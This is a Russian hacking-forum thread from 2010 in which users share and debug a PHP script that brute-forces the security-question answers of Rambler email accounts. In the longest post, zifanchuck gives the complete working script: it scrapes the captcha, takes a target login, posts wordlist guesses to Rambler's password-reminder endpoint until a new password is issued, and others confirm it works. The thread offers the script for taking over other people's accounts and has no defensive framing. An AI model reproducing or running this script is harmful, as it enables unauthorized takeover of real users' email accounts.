брутим....ответ на контрольный вопрос

Discussion in 'Песочница' started by Kusto, 26 Feb 2010.

  1. GoodGod

    GoodGod Elder - Старейшина

    Joined:
    20 Dec 2006
    Messages:
    216
    Likes Received:
    262
    Reputations:
    50
    еще работает эта тема?))
     
    #21 GoodGod, 23 Apr 2010
    Last edited: 23 Apr 2010
  2. anti4at

    anti4at New Member

    Joined:
    25 May 2009
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Подскажите как исправить ошибку? Плиз )
     
    #22 anti4at, 24 Apr 2010
    Last edited: 24 Apr 2010
  3. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    актуален сегодня скрипт или нет - незнаю (думаю что нет), ошибка- как я и говорил- детская, в 49 строке пропущенна ; (мы ведь с вами уже большие и знаем что в пыхе логическим завершением функции являеться- ; ) , можете затестить, если не работает и вы выложите свой вариант - рабочий, - подниму репутацию (как я и говорил мне просто неинтересна поддержка скрипта т к ислледования были чисто из любопытства)

    P.S. А да еще посмотрел скрипт- и увидел что форум в него всобачил пробел при отправке запроса к серваку....
     
  4. Mr.Replica

    Mr.Replica Member

    Joined:
    18 May 2010
    Messages:
    124
    Likes Received:
    41
    Reputations:
    10
    По идее скрипт должен быть ещё актуален так как багу никто не прикрывал и походу не собираются
     
  5. sir95

    sir95 New Member

    Joined:
    30 Nov 2009
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Хм...и в чём проблема? :D
     
  6. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    уже-ж сняли защиту от скрипткидди, неужели 49 строку трудно закончить с помощью ; ???
    https://forum.antichat.ru/showpost.php?p=2099570&postcount=23
     
  7. sir95

    sir95 New Member

    Joined:
    30 Nov 2009
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    А точно)), сори.
    Но капчу не показывает :confused:
     
  8. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    так подкорректируйте- неужели сложно? вродеж писали что багу неубрали, и я вроде выше писал что поддержка скрипта мне не интересна и если выложиш рабочий вариант здесь- подниму репу....(будет видно что не очередной скрипт кидди а думающий пользователь)
     
  9. vbcreate

    vbcreate New Member

    Joined:
    7 May 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Скрипт все еще рабочий, но не могу подкоректировать, что-бы каптчу показывал...
     
  10. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    для меня вообще загадка что там сложного????? адрес капчи имеет вид http://id.rambler.ru/captcha/e5a412b61b86c8ff4dbe3cd1b7126fa2.jpg и вот этот хеш(e5a412b61b86c8ff4dbe3cd1b7126fa2) дергаем с регуляркой из адреса http://id.rambler.ru/script/reminder.cgi а конкретно из этой строчки

    <input type="hidden" name="user.password" value="" />e5a412b61b86c8ff4dbe3cd1b7126fa2
    (хеш разумееться каждый раз новый)
    Так обьясните мне- неграмотному- чего здесь сложного????? (либо из другого там помоему 4 места откуда можно его дернуть....)
     
    #30 Kusto, 9 May 2010
    Last edited: 9 May 2010
  11. shaitanych

    shaitanych New Member

    Joined:
    2 May 2010
    Messages:
    7
    Likes Received:
    3
    Reputations:
    0
    Капчу пробовал сделать...
    но увы не получилось
    _ttp://test5.6te.net/index.php

    PHP:
    //получаем адрес каптчи 
    preg_match("#img id=\"secimage\" src=\"(http://id\.captcha\.rambler\.ru/(.*)\.jpg)#iU",$result$cap); 
    не знаю что сделать с этой частью
     
    #31 shaitanych, 10 May 2010
    Last edited: 10 May 2010
  12. petryxa

    petryxa Banned

    Joined:
    16 Apr 2009
    Messages:
    0
    Likes Received:
    66
    Reputations:
    2
    ап подправьте кто нибудь скрипт.
     
  13. UnderKAYF

    UnderKAYF Elder - Старейшина

    Joined:
    6 Jan 2010
    Messages:
    241
    Likes Received:
    29
    Reputations:
    27
    Интересует данная тема.
    И такой вопрос: кто-нибудь брутил на mail.ru?
     
  14. zifanchuck

    zifanchuck Elder - Старейшина

    Joined:
    27 Oct 2008
    Messages:
    396
    Likes Received:
    154
    Reputations:
    3
    Апдейт скрипта. Наверное последний. Сегодня просто сложились звезды, что я был не занят и мне было не впадлу что-то делать (такое бывает очень редко))))

    вот

    PHP:
    <?php
    // (c)Kusto & zifanchuck V2
    //for forum.antichat.ru
    set_time_limit(0);
    function 
    curl($url,$post)
    {
    $cfile 'cookies.txt';
    $ch curl_init();
    curl_setopt($chCURLOPT_RETURNTRANSFER1);
    curl_setopt($chCURLOPT_URL$url);
    curl_setopt($chCURLOPT_USERAGENT"Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1. Gecko/20100202 Firefox/3.5.8");
    curl_setopt($chCURLOPT_HEADER0);
    curl_setopt($chCURLOPT_POSTFIELDS$post);
    curl_setopt($chCURLOPT_COOKIEJAR$cfile);
    curl_setopt($chCURLOPT_COOKIEFILE$cfile);
    curl_setopt($chCURLOPT_FOLLOWLOCATIONtrue);
    curl_setopt($chCURLOPT_POST1);
    $result curl_exec($ch);
    curl_close($ch);
    return 
    $result;
    }


        function 
    read($path)
    {
       
    $file=fopen($path,"r");
       
    $bufer fread($file,filesize($path));
       
    fclose($file);
       return(
    $bufer);
    }

    $file 'my.txt';
    $domain $_POST['domain'];
    $login $_POST['login'];
    $captcha $_POST['captcha'];
    $id $_POST['id'];


    if(!
    $domain||!$login||!$captcha||!$id)
    {

    $result curl('http://id.rambler.ru/script/reminder.cgi','');
    $result iconv("utf-8""windows-1251"$result);

    //получаем адрес каптчи
    preg_match('#<img id="secimage" src="http://id.rambler.ru/captcha/(.*).jpg"#iU',$result$cap);
    $id=$cap[1];

        echo 
    '<form method="POST">
                <p align=center>
                    <label for="id-login">кого брутим?</label>
                    <span class="indicator">
                        <input type="text" class="text" name="login" />
                        <select id="id-domain" class="text" name="domain" tabindex="1">
                            <option value="rambler.ru"  >@rambler.ru</option>
                            <option value="lenta.ru"  >@lenta.ru</option>
                            <option value="myrambler.ru"  >@myrambler.ru</option>
                            <option value="autorambler.ru"  >@autorambler.ru</option>
                            <option value="ro.ru"  >@ro.ru</option>
                            <option value="r0.ru"  >@r0.ru</option>
                        </select>
                    </span><br>
                    <img id="secimage" src="http://id.rambler.ru/captcha/'
    .$id.'.jpg" width="300" height="60" alt="Введите показанные на картинке символы" border="0" title="Введите показанные на картинке символы"><br>
                Капча:<input type="text" name="captcha" value="" /><br>
              <input type="hidden" name="id" value="'
    .$id.'" />
                <input type=submit value="ПОЕХАЛИ!!!"></form>'
    ;
        exit;
    }
    else
    {
    $answers explode("\r\n",read($file));

    $result iconv("utf-8""windows-1251"curl("http://id.rambler.ru/script/reminder.cgi","action=question&skin=id&back=&back_immediate=&uniq_id=".$id."&user.password=&user.login=".$login."&user.domain=".$domain."&user.captcha=".$captcha."&done=%D0%9F%D1%80%D0%BE%D0%B4%D0%BE%D0%BB%D0%B6%D0    %B8%D1%82%D1%8C"));
    preg_match("#indicator\"\>\<strong>(.*)\<\/strong#iU",$result$qves);

        if (
    $qves[1])
        {
        echo 
    "<B><U><FONT SIZE=5 COLOR=GREEN>$qves[1]</FONT></U></B></br>";

            for(
    $i=0;$i<count($answers);$i++)
            {
            
    $fam $answers[$i];
            
    $bien iconv("utf-8""windows-1251",curl('http://id.rambler.ru/script/reminder.cgi','action=password&skin=id&uniq_id='.$_POST['id'].'&back=&user.password=&user.answer='.urlencode(iconv("windows-1251""utf-8",$fam))));
            if (
    strstr($bien"новый пароль")) { echo " поздравляю ответ подобран $fam";exit;}
            else {echo 
    "ответ $fam не подошел <br>";}
            
    flush();
            }

        }
        else
        {
                echo 
    '<form method="POST">
                <p align=center>
                    <b>Неправильно ввели каптчу!</b><br>
                    <label for="id-login">кого брутим?</label>
                    <span class="indicator">
                        <input type="text" class="text" name="login" />
                        <select id="id-domain" class="text" name="domain" tabindex="1">
                            <option value="rambler.ru"  >@rambler.ru</option>
                            <option value="lenta.ru"  >@lenta.ru</option>
                            <option value="myrambler.ru"  >@myrambler.ru</option>
                            <option value="autorambler.ru"  >@autorambler.ru</option>
                            <option value="ro.ru"  >@ro.ru</option>
                            <option value="r0.ru"  >@r0.ru</option>
                        </select>
                    </span><br>
                    <img id="secimage" src="http://id.rambler.ru/captcha/'
    .$id.'.jpg" width="300" height="60" alt="Введите показанные на картинке символы" border="0" title="Введите показанные на картинке символы"><br>
                Капча:<input type="text" name="captcha" value="" /><br>
              <input type="hidden" name="id" value="'
    .$id.'" />
                <input type=submit value="ПОЕХАЛИ!!!"></form>'
    ;
        }
    }
    ?>
     
    1 person likes this.
  15. phpdreamer

    phpdreamer Member

    Joined:
    26 Jul 2009
    Messages:
    522
    Likes Received:
    86
    Reputations:
    19
    допишу сюда ссылку на исправленную версию
    https://forum.antichat.ru/thread206154.html
    чтоб не потерялась...

    и добавлю в закладки на случай если пригодиться...

    ---
    ЗЫ zifanchuck наверно меня опередил и уже запостил апдейт выше
     
    1 person likes this.
  16. zifanchuck

    zifanchuck Elder - Старейшина

    Joined:
    27 Oct 2008
    Messages:
    396
    Likes Received:
    154
    Reputations:
    3
    Я как раз для той темы и писал скрипт))) ну точнее не только для нее, а просто попал сегодея на темку, посмотрел что не только тот чел хочет скрипт и решил допилить)
     
    2 people like this.
  17. freelsd

    freelsd Elder - Старейшина

    Joined:
    25 Oct 2007
    Messages:
    108
    Likes Received:
    25
    Reputations:
    10
    братюни, что-то он не находит верный ответ на вопрос
     
  18. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    только что (на денвере) проверил- правильный ответ поставил на 855 позицию(за все время испытаний- он ниразу не пропускал правильный ответ), правильный ответ был написанн кирилицей- скрипт его нашол за 7 минут, так что тема на сегодняшний день актуальна

    P.S. Надеюсь что словарь для брута с предпологаемыми ответами ты назвал my.txt и слова в него сложил в столбик????, а так-же поместил в ту-же дирректорию где находиться скрипт? И не забываем что регистр ответа на контр вопрос- важен(т е Иванова и иванова - это совершенно два разных слова)
     
    #38 Kusto, 1 Jul 2010
    Last edited: 1 Jul 2010
    1 person likes this.
  19. Imation

    Imation New Member

    Joined:
    7 Jan 2010
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Проблемка появилась :( Но не пойму что там в 27й строке..
    [​IMG]
    Использовался скритп "апдейт".
     
    #39 Imation, 1 Jul 2010
    Last edited: 1 Jul 2010
  20. Imation

    Imation New Member

    Joined:
    7 Jan 2010
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Всё работает, спасибо большое. Разобрался.
     
Loading...
Similar Threads - брутим ответ контрольный
  1. raarkil
    Replies:
    4
    Views:
    6,228